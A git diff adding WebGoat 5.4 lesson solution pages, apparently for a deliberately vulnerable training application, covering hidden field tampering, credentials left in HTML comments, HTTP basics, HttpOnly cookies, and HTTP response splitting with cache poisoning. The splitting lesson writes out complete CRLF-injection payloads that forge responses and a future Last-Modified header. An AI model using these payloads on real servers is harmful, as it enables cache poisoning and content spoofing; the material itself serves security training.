+
+
+
+
+
+
Figure 4 Change the Price variable to 1
+
+
+
+
+
+
Figure 5 Lesson 4 Completed
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db
new file mode 100644
index 000000000..ccd50130d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png
new file mode 100644
index 000000000..3757d471d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png
new file mode 100644
index 000000000..e3ba2d5cd
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png
new file mode 100644
index 000000000..1f0d5ebef
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png
new file mode 100644
index 000000000..a715a8db2
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png
new file mode 100644
index 000000000..2914f15ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg
new file mode 100644
index 000000000..06d8b5434
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg
new file mode 100644
index 000000000..3be37d0cf
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg
new file mode 100644
index 000000000..7feef4395
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg
new file mode 100644
index 000000000..6bbe14316
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg
new file mode 100644
index 000000000..02de6c5eb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues.html b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues.html
new file mode 100644
index 000000000..dd907cfb0
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues.html
@@ -0,0 +1,677 @@
+
+
+
+
+
+
Lesson
+Plan Title: How to
+Discover Clues in the HTML
+
+
+
+
Concept /
+Topic To Teach:
+
+
Developers
+are notorious for leaving statements like FIXME's, Code Broken, Hack, etc...
+inside the source code. Review the source code for any comments
+denoting passowrds, backdoors, or something doesn't work right.
+
+
+
+
General
+Goal(s):
+
+
The user
+should be able to bypass the authentication check.
+
+
+
+
+
+
Figure 1 Lesson 3
+
+
+
+
Right-click
+the page and select "View source"
+
+
+
+
Figure 2 View Source
+
+
+
+
Solution:
+
+
+
+
+
+
Examine the
+HTML source.
+
+
+
+
+
+
+
+
In the HTML
+source there is a comment that contains a user name admin and a password
+adminpw. Enter these values in WebGoat and click "Login"
+
+
+
+
+
+
Figure 3 Enter discovered credentials
+
+
+
+
+
+
Figure 4 Lesson 3 Completed
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png
new file mode 100644
index 000000000..16a985f95
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png
new file mode 100644
index 000000000..6c3b652b2
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png
new file mode 100644
index 000000000..baccb3c43
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png
new file mode 100644
index 000000000..7fe1df7d1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png
new file mode 100644
index 000000000..4e0f0026e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg
new file mode 100644
index 000000000..5c887a646
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg
new file mode 100644
index 000000000..80456d498
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg
new file mode 100644
index 000000000..38b875113
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg
new file mode 100644
index 000000000..3a8f380ac
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg
new file mode 100644
index 000000000..a9d131b57
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics.html b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics.html
new file mode 100644
index 000000000..73bfee09b
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics.html
@@ -0,0 +1,602 @@
+
+
+
+Solution: Http Basics
+
+
+
Lesson
+Plan Title: Http
+Basics
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+presents the basics for understanding the transfer of data between the browser
+and the web application.How HTTP works:
+
+
All HTTP transactions
+follow the same general format. Each client request and server response has
+three parts: the request or response line, a header section, and the entity
+body. The client initiates a transaction as follows:
+
+
+
+
+
+
General
+Goal(s):
+
+
Enter your
+name in the input field below and press "go" to submit. The server
+will accept the request, reverse the input, and display it back to the user,
+illustrating the basics of handling an HTTP request.
+
+
+
+
Solution:
+
+
Add a Proxy on localhost in the settings of your browser. Then you can start WebScarab .We have to select "intercept request" in the tab "Intercept".
+
+
+
+
Figure 1 Intercept Request
+
+
+
+
Fill out your
+name and click the button Go! We get a new WebScarab window, where we can find the parameter person.
+
+
+
+
+
+
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png
new file mode 100644
index 000000000..783a404ed
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png
new file mode 100644
index 000000000..7d0a0830c
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg
new file mode 100644
index 000000000..7b9b508a5
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg
new file mode 100644
index 000000000..cb6599a1f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg
new file mode 100644
index 000000000..5abdf6f73
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg
new file mode 100644
index 000000000..982f3f7bc
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly.html b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly.html
new file mode 100644
index 000000000..173622596
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly.html
@@ -0,0 +1,863 @@
+
+
+
+
+
+
Lesson Plan Title: HttpOnly Test
+
+
+
+
Concept / Topic To
+Teach:
+
+
+
+
To
+help mitigate the cross site scripting threat, Microsoft has introduced a new cookie
+attribute entitled 'HttpOnly.' If this flag is set, then the browser should not
+allow client-side script to access the cookie. Since the attribute is
+relatively new, several browsers neglect to handle the new attribute properly.
+
+
+
+
General Goal(s):
+
+
The
+purpose of this lesson is to test whether your browser supports the HTTPOnly
+cookie flag. Note the value of the unique2u cookie. If your browser supports
+HTTPOnly, and you enable it for a cookie, client side code should NOT be able
+to read OR write to that cookie, but the browser can still send its value to
+the server. Some browsers only prevent client side read access, but don't
+prevent write access.
+
+
+
+
+
+
Figure 1 Lesson HTTPOnly Test
+
+
+
+
Solution:
+
+
+
+
HTTPOnly
+is not configured. When you click on "Read Cookie" you will get the following
+pop-up in JavaScript, displaying the cookies
+
+
+
+
+
+
Figure 2 All cookies
+
+
+
+
Select
+"Yes" to turn HTTPOnly on. Intercept the HTTP Request and HTTP Response in
+WebScarab.
+
+
+
+
+
+
Figure 3 HTTP Request
+
+
+
+
+
+
Figure 4 HTTP Response with HTTPOnly
+cookie
+
+
+
+
+
+
Click
+on "Read cookie". You will see the JSESSIONID which is not using HTTPOnly.
+
+
+
+
Figure 5 Only JSESSIONID
+
+
+
+
+
+
Figure 6 HTTPOnly Success
+
+
+
+
Click
+on “Write cookie” which again only shows the JSESSIONID cookie.
+
+
+
+
+
+
Figure 7 JSESSIONID cookie
+
+
+
+
+
+
Figure 8 Lesson completed
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png
new file mode 100644
index 000000000..169190729
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png
new file mode 100644
index 000000000..597cc80eb
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png
new file mode 100644
index 000000000..24e98dab8
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png
new file mode 100644
index 000000000..6b5f8cb64
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png
new file mode 100644
index 000000000..443fc7029
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png
new file mode 100644
index 000000000..a378ec244
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png
new file mode 100644
index 000000000..98535fdfe
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg
new file mode 100644
index 000000000..efbe77300
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg
new file mode 100644
index 000000000..195c2529b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg
new file mode 100644
index 000000000..91d8d9c6d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg
new file mode 100644
index 000000000..adc7a901e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg
new file mode 100644
index 000000000..acfd921d1
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg
new file mode 100644
index 000000000..4c564391a
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg
new file mode 100644
index 000000000..56107235b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting.html b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting.html
new file mode 100644
index 000000000..68e0b687d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting.html
@@ -0,0 +1,1019 @@
+
+
+
+Solution: Http Splitting and Cache Poisoning
+
+
+
Lesson
+Plan Title: How to
+Perform Http Splitting
+
+
+
+
Concept /
+Topic To Teach:
+
+
This lesson
+teaches how to perform HTTP Splitting attacks.
+
+
+
+
How the
+attacks works:
+
+
The attacker
+passes malicious code to the web server together with normal input. A victim
+application will not be checking for CR (carriage return, also given by %0d or
+\r) and LF (line feed, also given by %0a or \n)characters. These characters not
+only give attackers control of the remaining headers and body of the response
+the application intends to send, but also allows them to create additional
+responses entirely under their control.Last-Modified:
+header and setting it to a future date. This will force the browser to send If-Modified-Since
+request header, which gives the attacker the chance to intercept the server's
+reply and replace it with a '304 Not Modified' reply. A sample of a 304 response
+is:
+
+
+
+
General
+Goal(s):
+
+
+
+
+This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while
+stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.
+
+
+
+
+
+
+
+
Solution:
+
+
+Please note that this solution is written for Windows. If you use Linux you have to alter it.
+Windows uses a CR and LF for new Line. Linux uses only LF.
+So all the %0d%0a have to be replaced by %0a if you are using Linux.
+
+
Because the
+input is not validated you can inject any HTTP syntax, carriage returns and
+line-feed you want.
+
+
+
+
Enter a
+language to examine what's going on. You do have WebScarab intercepting HTTP
+requests and responses?
+
+
+
+
+
+
Figure 1 Language en
+
+
+
+
Figure 2 HTTP Request
+
+
+
+
+
+
Figure 3 First HTTP Response
+
+
+
+
+
+
Figure 4 Second HTTP Request
+
+
+
+
Now inject
+for the language en%0d%0a%0d%0a%0d%0a
+
+
+
+
+
+
Figure 5 First HTTP Request
+
+
+
+
+
+
Figure 6 First HTTP Response
+
+
+
+
The
+Content-Length: 0 will tell the server that the first request is over.
+
+
A 200 OK
+message looks like this: HTTP/1.1 200 OK
+
+
+
+
Lets see what
+you can do with: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked
+ J </html>
+
+
+
+
+
+
Figure 7 HTTP Splitting attack
+
+
+
+
+
+
Figure 8 HTTP Response
+
+
+
+
+
+
Figure 9 Second HTTP Request
+
+
+
+
+
+
Figure 10 Second HTTP Response
+
+
+
+
+
+
Figure 11 Hacked!
+
+
+
+
Hit the "Back"
+button of your browser.
+
+
+
+
+
+
Figure 12 Stage 1 completed
+
+
+
+
Now you know
+how to do HTTP Splitting. You can abuse this technique to do a cache poisoning
+attack.
+
+
+
+
Cache
+poisoning requires manipulating the Last-Modified header. This must be changed
+to a date in the future.
+
+
Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Hacked
+ J </html>
+
+
+
+
+
+
Figure 13 Inject cache poisoning
+
+
+
+
+
+
+ Solution by Erwin Geirnaert
+
+
+
+
+
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png
new file mode 100644
index 000000000..a3cecc9aa
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png
new file mode 100644
index 000000000..d62c55ea3
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png
new file mode 100644
index 000000000..4168195ac
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png
new file mode 100644
index 000000000..d9f29ebed
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png
new file mode 100644
index 000000000..c75a97ac6
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png
new file mode 100644
index 000000000..addd9bce4
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png
new file mode 100644
index 000000000..4f70cbce7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png
new file mode 100644
index 000000000..08c036f4e
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png
new file mode 100644
index 000000000..9dccc349f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png
new file mode 100644
index 000000000..17708a3d7
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png
new file mode 100644
index 000000000..59bec4ece
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png
new file mode 100644
index 000000000..8887f463b
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png
new file mode 100644
index 000000000..83279f010
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png
new file mode 100644
index 000000000..ac9b0590f
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png differ
diff --git a/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg
new file mode 100644
index 000000000..1f2923a0d
Binary files /dev/null and b/webgoat-5.4/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg differ
